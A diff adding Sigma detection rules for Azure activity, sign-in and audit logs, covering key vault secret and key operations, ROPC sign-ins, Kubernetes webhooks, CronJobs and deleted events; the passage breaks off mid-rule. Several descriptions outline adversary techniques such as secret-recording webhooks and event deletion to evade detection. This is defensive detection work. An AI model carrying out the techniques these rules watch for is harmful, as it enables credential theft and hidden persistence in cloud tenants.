mode 100644 index 000000000..82222f0ca --- /dev/null +++ b/bin/main/rules/azure/azure_app_ropc_authentication.yml @@ -0,0 +1,24 @@ +title: Applications That Are Using ROPC Authentication Flow +id: 55695bc0-c8cf-461f-a379-2535f563c854 +description: Resource owner password credentials (ROPC) should be avoided if at all possible as this requires the user to expose their current password credentials to the application directly. The application then uses those credentials to authenticate the user against the identity provider. +author: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik' +date: 2022/06/01 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-authentication-flows +logsource: + product: azure + service: signinlogs +detection: + selection: + properties.message: ROPC + condition: selection +falsepositives: + - Applications that are being used as part of automated testing or a legacy application that cannot use any other modern authentication flow +level: medium +status: experimental +tags: + - attack.t1078 + - attack.defense_evasion + - attack.persistence + - attack.privilege_escalation + - attack.initial_access diff --git a/bin/main/rules/azure/azure_app_uri_modifications.yml b/bin/main/rules/azure/azure_app_uri_modifications.yml new file mode 100644 index 000000000..a2cda3522 --- /dev/null +++ b/bin/main/rules/azure/azure_app_uri_modifications.yml @@ -0,0 +1,24 @@ +title: Application URI Configuration Changes +id: 0055ad1f-be85-4798-83cf-a6da17c993b3 +description: Detects when a configuration change is made to an applications URI. + URIs for domain names that no longer exist (dangling URIs), not using HTTPS, wildcards at the end of the domain, URIs that are no unique to that app, + or URIs that point to domains you do not control should be investigated. +author: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik' +date: 2022/06/02 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-configuration-changes +logsource: + product: azure + service: auditlogs +detection: + selection: + properties.message: Update Application Sucess- Property Name AppAddress + condition: selection +falsepositives: + - When and administrator is making legitmate URI configuration changes to an application. This should be a planned event. +level: high +status: experimental +tags: + - attack.t1528 + - attack.persistence + - attack.credential_access diff --git a/bin/main/rules/azure/azure_application_deleted.yml b/bin/main/rules/azure/azure_application_deleted.yml new file mode 100644 index 000000000..a2e52ca9d --- /dev/null +++ b/bin/main/rules/azure/azure_application_deleted.yml @@ -0,0 +1,24 @@ +title: Azure Application Deleted +id: 410d2a41-1e6d-452f-85e5-abdd8257a823 +description: Identifies when a application is deleted in Azure. +author: Austin Songer @austinsonger +status: experimental +date: 2021/09/03 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - Delete application + - Hard Delete application + condition: selection +level: medium +tags: + - attack.defense_evasion +falsepositives: + - Application being deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Application deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/azure/azure_application_gateway_modified_or_deleted.yml b/bin/main/rules/azure/azure_application_gateway_modified_or_deleted.yml new file mode 100644 index 000000000..d242e0caa --- /dev/null +++ b/bin/main/rules/azure/azure_application_gateway_modified_or_deleted.yml @@ -0,0 +1,24 @@ +title: Azure Application Gateway Modified or Deleted +id: ad87d14e-7599-4633-ba81-aeb60cfe8cd6 +description: Identifies when a application gateway is modified or deleted. +author: Austin Songer +status: experimental +date: 2021/08/16 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - MICROSOFT.NETWORK/APPLICATIONGATEWAYS/WRITE + - MICROSOFT.NETWORK/APPLICATIONGATEWAYS/DELETE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Application gateway being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Application gateway modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/azure/azure_application_security_group_modified_or_deleted.yml b/bin/main/rules/azure/azure_application_security_group_modified_or_deleted.yml new file mode 100644 index 000000000..abd3d183e --- /dev/null +++ b/bin/main/rules/azure/azure_application_security_group_modified_or_deleted.yml @@ -0,0 +1,24 @@ +title: Azure Application Security Group Modified or Deleted +id: 835747f1-9329-40b5-9cc3-97d465754ce6 +description: Identifies when a application security group is modified or deleted. +author: Austin Songer +status: experimental +date: 2021/08/16 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - MICROSOFT.NETWORK/APPLICATIONSECURITYGROUPS/WRITE + - MICROSOFT.NETWORK/APPLICATIONSECURITYGROUPS/DELETE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Application security group being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Application security group modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/azure/azure_blocked_account_attempt.yml b/bin/main/rules/azure/azure_blocked_account_attempt.yml new file mode 100644 index 000000000..cf0984b80 --- /dev/null +++ b/bin/main/rules/azure/azure_blocked_account_attempt.yml @@ -0,0 +1,23 @@ +title: Account Disabled or Blocked for Sign in Attempts +id: 4afac85c-224a-4dd7-b1af-8da40e1c60bd +description: Detects when an account is disabled or blocked for sign in but tried to log in +author: Yochana Henderson, '@Yochana-H' +date: 2022/06/17 +references: + - https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts +logsource: + product: azure + service: signinlogs +detection: + selection: + ResultType: 50057 + ResultDescription: Failure + condition: selection +level: medium +falsepositives: + - Account disabled or blocked in error + - Automation account has been blocked or disabled +status: experimental +tags: + - attack.credential_access + - attack.t1110 diff --git a/bin/main/rules/azure/azure_change_to_authentication_method.yml b/bin/main/rules/azure/azure_change_to_authentication_method.yml new file mode 100644 index 000000000..b251b5c25 --- /dev/null +++ b/bin/main/rules/azure/azure_change_to_authentication_method.yml @@ -0,0 +1,22 @@ +title: Change to Authentication Method +id: 4d78a000-ab52-4564-88a5-7ab5242b20c7 +status: experimental +author: AlertIQ +date: 2021/10/10 +description: Change to authentication method could be an indicated of an attacker adding an auth method to the account so they can have continued access. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts +logsource: + product: azure + service: auditlogs +detection: + selection: + LoggedByService: 'Authentication Methods' + Category: 'UserManagement' + OperationName: 'User registered security info' + condition: selection +level: medium +falsepositives: + - Unknown +tags: + - attack.credential_access diff --git a/bin/main/rules/azure/azure_conditional_access_failure.yml b/bin/main/rules/azure/azure_conditional_access_failure.yml new file mode 100644 index 000000000..d0af28e9b --- /dev/null +++ b/bin/main/rules/azure/azure_conditional_access_failure.yml @@ -0,0 +1,24 @@ +title: Sign-in Failure Due to Conditional Access Requirements Not Met +id: b4a6d707-9430-4f5f-af68-0337f52d5c42 +description: Define a baseline threshold for failed sign-ins due to Conditional Access failures +author: Yochana Henderson, '@Yochana-H' +date: 2022/06/01 +references: + - https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts +logsource: + product: azure + service: signinlogs +detection: + selection: + ResultType: 53003 + Resultdescription: Blocked by Conditional Access + condition: selection +falsepositives: + - Service Account misconfigured + - Misconfigured Systems + - Vulnerability Scanners +level: high +status: experimental +tags: + - attack.credential_access + - attack.t1110 diff --git a/bin/main/rules/azure/azure_container_registry_created_or_deleted.yml b/bin/main/rules/azure/azure_container_registry_created_or_deleted.yml new file mode 100644 index 000000000..e47111824 --- /dev/null +++ b/bin/main/rules/azure/azure_container_registry_created_or_deleted.yml @@ -0,0 +1,27 @@ +title: Azure Container Registry Created or Deleted +id: 93e0ef48-37c8-49ed-a02c-038aab23628e +description: Detects when a Container Registry is created or deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/07 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes + - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ + - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 + - https://attack.mitre.org/matrices/enterprise/cloud/ +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - MICROSOFT.CONTAINERREGISTRY/REGISTRIES/WRITE + - MICROSOFT.CONTAINERREGISTRY/REGISTRIES/DELETE + condition: selection +level: low +tags: + - attack.impact +falsepositives: + - Container Registry being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Container Registry created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/azure/azure_creating_number_of_resources_detection.yml b/bin/main/rules/azure/azure_creating_number_of_resources_detection.yml new file mode 100644 index 000000000..04c3ed96e --- /dev/null +++ b/bin/main/rules/azure/azure_creating_number_of_resources_detection.yml @@ -0,0 +1,22 @@ +title: Number Of Resource Creation Or Deployment Activities +id: d2d901db-7a75-45a1-bc39-0cbf00812192 +status: test +description: Number of VM creations or deployment activities occur in Azure via the azureactivity log. +author: sawwinnnaung +references: + - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/azureactivity/Creating_Anomalous_Number_Of_Resources_detection.yaml +date: 2020/05/07 +modified: 2021/11/27 +logsource: + product: azure + service: azureactivity +detection: + keywords: + - Microsoft.Compute/virtualMachines/write + - Microsoft.Resources/deployments/write + condition: keywords +falsepositives: + - Valid change +level: medium +tags: + - attack.t1098 diff --git a/bin/main/rules/azure/azure_device_no_longer_managed_or_compliant.yml b/bin/main/rules/azure/azure_device_no_longer_managed_or_compliant.yml new file mode 100644 index 000000000..5fc10bc63 --- /dev/null +++ b/bin/main/rules/azure/azure_device_no_longer_managed_or_compliant.yml @@ -0,0 +1,22 @@ +title: Azure Device No Longer Managed or Compliant +id: 542b9912-c01f-4e3f-89a8-014c48cdca7d +description: Identifies when a device in azure is no longer managed or compliant +author: Austin Songer @austinsonger +status: experimental +date: 2021/09/03 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#core-directory +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - Device no longer compliant + - Device no longer managed + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Administrator may have forgotten to review the device. diff --git a/bin/main/rules/azure/azure_device_or_configuration_modified_or_deleted.yml b/bin/main/rules/azure/azure_device_or_configuration_modified_or_deleted.yml new file mode 100644 index 000000000..9f18c1e9f --- /dev/null +++ b/bin/main/rules/azure/azure_device_or_configuration_modified_or_deleted.yml @@ -0,0 +1,26 @@ +title: Azure Device or Configuration Modified or Deleted +id: 46530378-f9db-4af9-a9e5-889c177d3881 +description: Identifies when a device or device configuration in azure is modified or deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/09/03 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#core-directory +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - Delete device + - Delete device configuration + - Update device + - Update device configuration + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Device or device configuration being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Device or device configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/azure/azure_dns_zone_modified_or_deleted.yml b/bin/main/rules/azure/azure_dns_zone_modified_or_deleted.yml new file mode 100644 index 000000000..faa86c01e --- /dev/null +++ b/bin/main/rules/azure/azure_dns_zone_modified_or_deleted.yml @@ -0,0 +1,24 @@ +title: Azure DNS Zone Modified or Deleted +id: af6925b0-8826-47f1-9324-337507a0babd +description: Identifies when DNS zone is modified or deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/08 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message|startswith: MICROSOFT.NETWORK/DNSZONES + properties.message|endswith: + - /WRITE + - /DELETE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - DNS zone modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - DNS zone modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/azure/azure_federation_modified.yml b/bin/main/rules/azure/azure_federation_modified.yml new file mode 100644 index 000000000..4512ee967 --- /dev/null +++ b/bin/main/rules/azure/azure_federation_modified.yml @@ -0,0 +1,25 @@ +title: Azure Domain Federation Settings Modified +id: 352a54e1-74ba-4929-9d47-8193d67aba1e +description: Identifies when an user or application modified the federation settings on the domain. +author: Austin Songer +status: experimental +date: 2021/09/06 +modified: 2022/06/08 +references: + - https://attack.mitre.org/techniques/T1078 + - https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-monitor-federation-changes +logsource: + product: azure + service: auditlogs +detection: + selection: + ActivityDisplayName: Set federation settings on domain + condition: selection +level: medium +tags: + - attack.initial_access + - attack.t1078 +falsepositives: + - Federation Settings being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Federation Settings modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/azure/azure_firewall_modified_or_deleted.yml b/bin/main/rules/azure/azure_firewall_modified_or_deleted.yml new file mode 100644 index 000000000..28c659a05 --- /dev/null +++ b/bin/main/rules/azure/azure_firewall_modified_or_deleted.yml @@ -0,0 +1,23 @@ +title: Azure Firewall Modified or Deleted +id: 512cf937-ea9b-4332-939c-4c2c94baadcd +description: Identifies when a firewall is created, modified, or deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/08 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - MICROSOFT.NETWORK/AZUREFIREWALLS/WRITE + - MICROSOFT.NETWORK/AZUREFIREWALLS/DELETE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Firewall being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Firewall modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/azure/azure_firewall_rule_collection_modified_or_deleted.yml b/bin/main/rules/azure/azure_firewall_rule_collection_modified_or_deleted.yml new file mode 100644 index 000000000..de1fc0c5d --- /dev/null +++ b/bin/main/rules/azure/azure_firewall_rule_collection_modified_or_deleted.yml @@ -0,0 +1,27 @@ +title: Azure Firewall Rule Collection Modified or Deleted +id: 025c9fe7-db72-49f9-af0d-31341dd7dd57 +description: Identifies when Rule Collections (Application, NAT, and Network) is being modified or deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/08 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - MICROSOFT.NETWORK/AZUREFIREWALLS/APPLICATIONRULECOLLECTIONS/WRITE + - MICROSOFT.NETWORK/AZUREFIREWALLS/APPLICATIONRULECOLLECTIONS/DELETE + - MICROSOFT.NETWORK/AZUREFIREWALLS/NATRULECOLLECTIONS/WRITE + - MICROSOFT.NETWORK/AZUREFIREWALLS/NATRULECOLLECTIONS/DELETE + - MICROSOFT.NETWORK/AZUREFIREWALLS/NETWORKRULECOLLECTIONS/WRITE + - MICROSOFT.NETWORK/AZUREFIREWALLS/NETWORKRULECOLLECTIONS/DELETE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Rule Collections (Application, NAT, and Network) being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Rule Collections (Application, NAT, and Network) modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/azure/azure_granting_permission_detection.yml b/bin/main/rules/azure/azure_granting_permission_detection.yml new file mode 100644 index 000000000..d1fb9dfd4 --- /dev/null +++ b/bin/main/rules/azure/azure_granting_permission_detection.yml @@ -0,0 +1,21 @@ +title: Granting Of Permissions To An Account +id: a622fcd2-4b5a-436a-b8a2-a4171161833c +status: test +description: Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used. +author: sawwinnnaung +references: + - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/azureactivity/Granting_Permissions_To_Account_detection.yaml +date: 2020/05/07 +modified: 2021/11/27 +logsource: + product: azure + service: azureactivity +detection: + keywords: + - Microsoft.Authorization/roleAssignments/write + condition: keywords +falsepositives: + - Valid change +level: medium +tags: + - attack.t1098 diff --git a/bin/main/rules/azure/azure_keyvault_key_modified_or_deleted.yml b/bin/main/rules/azure/azure_keyvault_key_modified_or_deleted.yml new file mode 100644 index 000000000..ab657e79c --- /dev/null +++ b/bin/main/rules/azure/azure_keyvault_key_modified_or_deleted.yml @@ -0,0 +1,34 @@ +title: Azure Keyvault Key Modified or Deleted +id: 80eeab92-0979-4152-942d-96749e11df40 +description: Identifies when a Keyvault Key is modified or deleted in Azure. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/16 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - MICROSOFT.KEYVAULT/VAULTS/KEYS/UPDATE/ACTION + - MICROSOFT.KEYVAULT/VAULTS/KEYS/CREATE + - MICROSOFT.KEYVAULT/VAULTS/KEYS/CREATE/ACTION + - MICROSOFT.KEYVAULT/VAULTS/KEYS/IMPORT/ACTION + - MICROSOFT.KEYVAULT/VAULTS/KEYS/RECOVER/ACTION + - MICROSOFT.KEYVAULT/VAULTS/KEYS/RESTORE/ACTION + - MICROSOFT.KEYVAULT/VAULTS/KEYS/DELETE + - MICROSOFT.KEYVAULT/VAULTS/KEYS/BACKUP/ACTION + - MICROSOFT.KEYVAULT/VAULTS/KEYS/PURGE/ACTION + condition: selection +level: medium +tags: + - attack.impact + - attack.credential_access + - attack.t1552 + - attack.t1552.001 +falsepositives: + - Key being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Key modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/azure/azure_keyvault_modified_or_deleted.yml b/bin/main/rules/azure/azure_keyvault_modified_or_deleted.yml new file mode 100644 index 000000000..d63cfe24d --- /dev/null +++ b/bin/main/rules/azure/azure_keyvault_modified_or_deleted.yml @@ -0,0 +1,29 @@ +title: Azure Key Vault Modified or Deleted +id: 459a2970-bb84-4e6a-a32e-ff0fbd99448d +description: Identifies when a key vault is modified or deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/16 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - MICROSOFT.KEYVAULT/VAULTS/WRITE + - MICROSOFT.KEYVAULT/VAULTS/DELETE + - MICROSOFT.KEYVAULT/VAULTS/DEPLOY/ACTION + - MICROSOFT.KEYVAULT/VAULTS/ACCESSPOLICIES/WRITE + condition: selection +level: medium +tags: + - attack.impact + - attack.credential_access + - attack.t1552 + - attack.t1552.001 +falsepositives: + - Key Vault being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Key Vault modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/azure/azure_keyvault_secrets_modified_or_deleted.yml b/bin/main/rules/azure/azure_keyvault_secrets_modified_or_deleted.yml new file mode 100644 index 000000000..b31895d4a --- /dev/null +++ b/bin/main/rules/azure/azure_keyvault_secrets_modified_or_deleted.yml @@ -0,0 +1,33 @@ +title: Azure Keyvault Secrets Modified or Deleted +id: b831353c-1971-477b-abb6-2828edc3bca1 +description: Identifies when secrets are modified or deleted in Azure. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/16 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - MICROSOFT.KEYVAULT/VAULTS/SECRETS/WRITE + - MICROSOFT.KEYVAULT/VAULTS/SECRETS/DELETE + - MICROSOFT.KEYVAULT/VAULTS/SECRETS/BACKUP/ACTION + - MICROSOFT.KEYVAULT/VAULTS/SECRETS/PURGE/ACTION + - MICROSOFT.KEYVAULT/VAULTS/SECRETS/UPDATE/ACTION + - MICROSOFT.KEYVAULT/VAULTS/SECRETS/RECOVER/ACTION + - MICROSOFT.KEYVAULT/VAULTS/SECRETS/RESTORE/ACTION + - MICROSOFT.KEYVAULT/VAULTS/SECRETS/SETSECRET/ACTION + condition: selection +level: medium +tags: + - attack.impact + - attack.credential_access + - attack.t1552 + - attack.t1552.001 +falsepositives: + - Secrets being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/azure/azure_kubernetes_admission_controller.yml b/bin/main/rules/azure/azure_kubernetes_admission_controller.yml new file mode 100644 index 000000000..d8f36f7b2 --- /dev/null +++ b/bin/main/rules/azure/azure_kubernetes_admission_controller.yml @@ -0,0 +1,34 @@ +title: Azure Kubernetes Admission Controller +id: a61a3c56-4ce2-4351-a079-88ae4cbd2b58 +description: Identifies when an admission controller is executed in Azure Kubernetes. A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster. For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials. An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information. +author: Austin Songer @austinsonger +status: experimental +date: 2021/11/25 +modified: 2021/11/26 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes +logsource: + product: azure + service: activitylogs +detection: + selection1: + properties.message|startswith: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/ADMISSIONREGISTRATION.K8S.IO + properties.message|endswith: + - /MUTATINGWEBHOOKCONFIGURATIONS/WRITE + - /VALIDATINGWEBHOOKCONFIGURATIONS/WRITE + selection2: + properties.message|startswith: MICROSOFT.CONTAINERSERVICE/MANAGEDCLUSTERS/ADMISSIONREGISTRATION.K8S.IO + properties.message|endswith: + - /MUTATINGWEBHOOKCONFIGURATIONS/WRITE + - /VALIDATINGWEBHOOKCONFIGURATIONS/WRITE + condition: selection1 or selection2 +level: medium +tags: + - attack.persistence + - attack.t1078 + - attack.credential_access + - attack.t1552 + - attack.t1552.007 +falsepositives: +- Azure Kubernetes Admissions Controller may be done by a system administrator. +- If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/azure/azure_kubernetes_cluster_created_or_deleted.yml b/bin/main/rules/azure/azure_kubernetes_cluster_created_or_deleted.yml new file mode 100644 index 000000000..d9be4f586 --- /dev/null +++ b/bin/main/rules/azure/azure_kubernetes_cluster_created_or_deleted.yml @@ -0,0 +1,27 @@ +title: Azure Kubernetes Cluster Created or Deleted +id: 9541f321-7cba-4b43-80fc-fbd1fb922808 +description: Detects when a Azure Kubernetes Cluster is created or deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/07 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes + - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ + - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 + - https://attack.mitre.org/matrices/enterprise/cloud/ +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/DELETE + condition: selection +level: low +tags: + - attack.impact +falsepositives: + - Kubernetes cluster being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Kubernetes cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/azure/azure_kubernetes_cronjob.yml b/bin/main/rules/azure/azure_kubernetes_cronjob.yml new file mode 100644 index 000000000..146f196aa --- /dev/null +++ b/bin/main/rules/azure/azure_kubernetes_cronjob.yml @@ -0,0 +1,34 @@ +title: Azure Kubernetes CronJob +id: 1c71e254-6655-42c1-b2d6-5e4718d7fc0a +description: Identifies when a Azure Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. An Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster. +author: Austin Songer @austinsonger +status: experimental +date: 2021/11/22 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes + - https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/ + - https://kubernetes.io/docs/concepts/workloads/controllers/job/ + - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ +logsource: + product: azure + service: activitylogs +detection: + selection1: + properties.message|startswith: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/BATCH + properties.message|endswith: + - /CRONJOBS/WRITE + - /JOBS/WRITE + selection2: + properties.message|startswith: MICROSOFT.CONTAINERSERVICE/MANAGEDCLUSTERS/BATCH + properties.message|endswith: + - /CRONJOBS/WRITE + - /JOBS/WRITE + condition: selection1 or selection2 +level: medium +tags: + - attack.persistence + - attack.privilege_escalation + - attack.execution +falsepositives: + - Azure Kubernetes CronJob/Job may be done by a system administrator. + - If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/azure/azure_kubernetes_events_deleted.yml b/bin/main/rules/azure/azure_kubernetes_events_deleted.yml new file mode 100644 index 000000000..9252c26fb --- /dev/null +++ b/bin/main/rules/azure/azure_kubernetes_events_deleted.yml @@ -0,0 +1,23 @@ +title: Azure Kubernetes Events Deleted +id: 225d8b09-e714-479c-a0e4-55e6f29adf35 +description: Detects when Events are deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection. +author: Austin Songer @austinsonger +status: experimental +date: 2021/07/24 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes + - https://github.com/elastic/detection-rules/blob/da3852b681cf1a33898b1535892eab1f3a76177a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml +logsource: + product: azure + service: activitylogs +detection: + selection_operation_name: + properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EVENTS.K8S.IO/EVENTS/DELETE + condition: selection_operation_name +level: medium +tags: + - attack.defense_evasion + - attack.t1562 + - attack.t1562.001 +falsepositives: +- Event deletions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Events deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/azure/azure_kubernetes_network_policy_change.yml b/bin/main/rules/azure/azure_kubernetes_network_policy_change.yml new file mode 100644 index 000000000..71b65a4f2 --- /dev/null +++ b/bin/main/rules/azure/azure_kubernetes_network_policy_change.yml @@ -0,0 +1,30 @@ +title: Azure Kubernetes Network Policy Change +id: 08d6ac24-c927-4469-b3b7-2e422d6e3c43 +description: Identifies when a Azure Kubernetes network policy is modified or deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/07 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes + - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ + - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 + - https://attack.mitre.org/matrices/enterprise/cloud/ +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/NETWORKING.K8S.IO/NETWORKPOLICIES/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/NETWORKING.K8S.IO/NETWORKPOLICIES/DELETE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EXTENSIONS/NETWORKPOLICIES/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EXTENSIONS/NETWORKPOLICIES/DELETE + condition: selection +level: medium +tags: + - attack.impact + - attack.credential_access +falsepositives: + - Network Policy being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Network Policy being modified and deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/azure/azure_kubernetes_pods_deleted.yml b/bin/main/rules/azure/azure_kubernetes_pods_deleted.yml new file mode 100644 index 000000000..ac7d0e1df --- /dev/null +++ b/bin/main/rules/azure/azure_kubernetes_pods_deleted.yml @@ -0,0 +1,22 @@ +title: Azure Kubernetes Pods Deleted +id: b02f9591-12c3-4965-986a-88028629b2e1 +description: Identifies the 